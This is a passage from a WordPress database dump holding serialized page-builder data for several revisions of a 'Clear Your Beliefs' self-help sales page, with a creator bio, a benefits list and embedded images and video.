height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(959, 1478, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:233:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]<img class="aligncenter size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" />[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2517:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(961, 1479, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:229:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]<img class="aligncenter  wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2517:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(962, 1480, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:228:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2517:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(963, 1481, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:228:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:228:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:228:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2517:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn 